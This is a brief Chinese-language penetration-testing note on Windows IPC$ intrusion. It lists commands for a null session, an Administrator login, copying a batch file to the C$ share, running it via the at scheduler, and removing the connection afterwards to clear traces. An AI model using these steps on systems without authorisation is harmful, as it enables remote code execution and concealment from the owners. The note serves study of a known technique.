IPC
什么是IPC?
IPC(Internet Process Connect),直译过来就是网络进程连接,一般用来进行资源共享的。
我们经常会说IPC空连接,就是连接的时候不用账户和密码,但是一般这种情况是没啥权限的,如果我们能有一个管理员的账户,那么就可以有管理员的权限来进行渗透了。
IPC入侵思路
因为渗透的时候是需要灵活的技巧,因此这里只是记录一个渗透思路罢了。
IPC空连接
1 | net use \\ip\ipc$ "" /user:"" |
以某用户账户登陆
1 | net use \\ip\ipc$ "password" /user:Administrator |
之后,我们可以写一个批处理文件,里面包含这我们想执行的命令,然后copy到服务器上
1 | copy 1.bat \\ip\c$ |
这样,就会把它上传到c盘
之后我们可以利用windows的定时任务来执行这个文件
首先我们看一下服务器上的时间
1 | net time \\ip |
之后利用at
命令来设置定时任务
1 | at \\ip 时间 文件名 |
渗透完毕后记得删掉记录
1 | net use \\ip\ipc$ /del |